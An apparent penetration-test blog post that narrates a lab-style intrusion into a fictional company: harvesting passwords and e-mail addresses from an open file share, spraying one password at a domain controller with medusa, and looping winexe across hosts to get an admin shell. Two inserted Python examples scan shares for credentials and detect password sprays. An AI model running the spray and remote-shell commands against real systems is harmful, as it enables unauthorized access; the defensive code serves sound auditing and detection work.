It Takes Two to Tango (myself, and your unprotected file share)

BananaStand learned from last time (to see last time, go here). Systems were patched, ACLs were locked down, the SIEM was tuned, and the security team got a new coffee pot just to help keep them on edge. Round 2 of our test started early on a Monday morning from within a far-away remote office full of developers. At first, I didn't find a thing. I spent what seemed like weeks looking for a way in. I started to doubt my life as a pentester, and began to wonder whether I too could sell frozen bananas to pay the bills. It couldn't be that bad; I'm a fan of bananas. Set my own hours, hone my salesman skills, get my daily allotment of potassium… Then, just as I was drafting my resignation email, I saw a flicker on my terminal: 
[+] Attempting to map shares on 10.2.1.61
//10.2.1.61/test_share  Mapping: OK, Listing: OK

A share we can access! I save my resignation email as a draft and start enumerating this machine. It looks like a developer's OS X machine, with the test_share directory shared out to the world. I mount the share and start digging around. It holds some old DB import scripts, snippets of source code, test data, Sharon.avi (which I'm afraid to click on), and various other nuggets of gold. As you should do with any unknown files, I grepped through them for 'password': 
# grep -ri password /mnt/test_share/

./test_share/archive/Test/ab2.php:define("PASSWORD", "chillyBanana8"); // Your default super-secret password.
./test_share/archive/OLD/test/config.php:// username and password to log onto db server
./test_share/archive/OLD/test/config.php:$dbpassword='gigglebits';

Awesome, some potentially valid passwords. I tried connecting directly to the DB, but it was offline. I bet that chillyBanana8 password is used in more places than this. I wanted to try it against some domain users, so I grepped through the share with a regex that extracts every email address ending in @bananastand.com, giving us a nice list of 35 or so users. Then I fired up medusa with our user list and the password we found in the source code against a Domain Controller: 
medusa -h 10.2.1.10 -U users.from.source.code -p chillyBanana8 -e ns -M smbnt
...
ACCOUNT FOUND: [smbnt] Host: 10.250.194.11 User: gmbluth Password: chillyBanana8 [SUCCESS]
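
The grep for 'password' and the e-mail harvest above are exactly what a share owner should run against their own exports before the share is ever exposed. The following is an added example, not code from the original post: a small Python scanner (assumed names scan_share and build_sample_share) that walks a mounted share, reports hard-coded credential assignments by file, line and variable name without echoing the secret, and lists every address for a given domain, since that address list is the user list the spray against the DC was built from. The sample files it writes are constructed to mirror the grep hits above; dev2@bananastand.com is made up.

```python
import os
import re
import tempfile

# Credential-assignment shapes from the grep output above: a PHP
# define("PASSWORD", ...) and a $dbpassword='...' style variable.
CRED_PATTERNS = [
    re.compile(r'define\(\s*["\'](\w*pass\w*)["\']\s*,\s*["\']([^"\']+)["\']', re.I),
    re.compile(r'\$?(\w*pass(?:word|wd)\w*)\s*=\s*["\']([^"\']+)["\']', re.I),
]

def scan_share(root, domain):
    """Walk a mounted share; return (findings, sorted e-mail list). A finding is
    (relative path, line number, variable name): the secret value itself is left
    out so the report can be circulated to the share owner safely."""
    email_re = re.compile(r'[\w.+-]+@' + re.escape(domain), re.I)
    findings, emails = [], set()
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='ignore') as fh:
                for lineno, line in enumerate(fh, 1):
                    emails.update(e.lower() for e in email_re.findall(line))
                    for pat in CRED_PATTERNS:
                        m = pat.search(line)
                        if m:
                            findings.append((os.path.relpath(path, root), lineno, m.group(1)))
                            break
    return findings, sorted(emails)

# Constructed stand-in for test_share, mirroring the grep hits in the write-up;
# dev2@bananastand.com is a made-up address, not one from the engagement.
SAMPLE_FILES = {
    'archive/Test/ab2.php': 'define("PASSWORD", "chillyBanana8"); // default\n',
    'archive/OLD/test/config.php': '// username and password to log onto db server\n'
                                   "$dbpassword='gigglebits';\n",
    'archive/OLD/test/import.sql': '-- owners: gmbluth@bananastand.com, dev2@bananastand.com\n'
                                   '-- vendor contact: support@example.com\n',
}

def build_sample_share():
    """Write SAMPLE_FILES into a fresh temp directory and return its path."""
    root = tempfile.mkdtemp()
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'w', encoding='utf-8') as fh:
            fh.write(content)
    return root
```

Running scan_share(build_sample_share(), 'bananastand.com') returns the two credential hits and the two harvested addresses; point it at a real mount point instead to audit a live share.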

Great! Now we have a valid user account on the BananaStand domain. My next step is to see where this little guy has admin access. Let's just wrap winexe in a quick for loop. Where we get ACCESS_DENIED, we don't have administrative access to the system. Where we get a shell, we do :) 
for i in $(cat smb.hosts); do echo $i; ./winexe -U mbluth%chillyBanana8 --uninstall //$i cmd; done
10.2.1.25
ERROR: Failed to open connection - NT_STATUS_ACCESS_DENIED
10.2.1.31
ERROR: Failed to open connection - NT_STATUS_ACCESS_DENIED
10.2.1.32
ERROR: Failed to open connection - NT_STATUS_ACCESS_DENIED
10.2.1.33
ERROR: Failed to open connection - NT_STATUS_ACCESS_DENIED
10.2.1.35
ERROR: Failed to open connection - NT_STATUS_ACCESS_DENIED
10.2.1.38
ERROR: Failed to open connection - NT_STATUS_ACCESS_DENIED
10.2.1.42
ERROR: Failed to open connection - NT_STATUS_ACCESS_DENIED
10.2.1.43
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : BANANASTAND
   IPv4 Address. . . . . . . . . . . : 10.2.1.43
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.2.1.1
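
The medusa run was one password against 35 users from one source in well under a minute, which looks nothing like a user mistyping their own password; that shape is what the freshly tuned SIEM should have caught. The following is an added example, not code from the original post: Python detection logic (assumed names parse_events, detect_spray, build_sample_events) that parses normalised logon records, flags any source failing logons for many distinct users inside a sliding window, and reports accounts that then succeeded from the same source. The log lines, timestamps and the source address 10.2.9.99 are constructed, not real BananaStand logs.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One normalised logon record per line: <ISO time> <source IP> <target user> <result>
LINE_RE = re.compile(r'^(\S+) (\d+\.\d+\.\d+\.\d+) (\S+) (FAILED|SUCCESS)$')

def parse_events(text):
    """Parse records into (datetime, source, user, result); skip malformed lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m.group(1)),) + m.groups()[1:])
    return events

def detect_spray(events, window=timedelta(minutes=5), min_users=10):
    """Flag sources that fail logons for many distinct users inside `window`.
    A brute force hammers one account; a spray like the medusa run above is one
    password across a user list, so count users, not attempts. Accounts that
    later succeeded from the same source are reported alongside."""
    failed, succeeded = defaultdict(list), defaultdict(set)
    for ts, src, user, result in events:
        if result == 'FAILED':
            failed[src].append((ts, user))
        else:
            succeeded[src].add(user)
    alerts = []
    for src, attempts in failed.items():
        attempts.sort()
        lo, peak = 0, 0
        for hi in range(len(attempts)):           # sliding time window
            while attempts[hi][0] - attempts[lo][0] > window:
                lo += 1
            peak = max(peak, len({u for _, u in attempts[lo:hi + 1]}))
        if peak >= min_users:
            alerts.append((src, peak, sorted(succeeded[src])))
    return sorted(alerts)

def build_sample_events():
    """Constructed sample, not real BananaStand logs: one source spraying 35
    users inside a minute and getting one hit, plus 'devuser' mistyping their
    own password three times from their own workstation."""
    base = datetime(2013, 3, 4, 8, 0, 0)
    lines = [f'{(base + timedelta(seconds=i)).isoformat()} 10.2.9.99 user{i:02d} FAILED'
             for i in range(35)]
    lines.append(f'{(base + timedelta(seconds=36)).isoformat()} 10.2.9.99 gmbluth SUCCESS')
    lines += [f'{(base + timedelta(seconds=10 * i)).isoformat()} 10.2.1.25 devuser FAILED'
              for i in range(3)]
    return '\n'.join(lines)
```

detect_spray(parse_events(build_sample_events())) reports the spraying source with 35 distinct users and the gmbluth account that succeeded from it, while the three typos from 10.2.1.25 stay below the threshold.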

Shazam! Our compromised user account gives us admin access to the workstation (enough to run winexe / psexec and compromise the box, anyway). From here, we have any number of paths to work our way up to a higher privilege level, and then start the long hunt for access into their DMZ and recovery of critical data (most likely secret banana recipes). As I furiously type an email to my boss demanding a raise, I start to chuckle at my imagined life as a banana salesman. It wouldn't be all bad, I suppose. Any way you look at it, there's always money in the BananaStand.
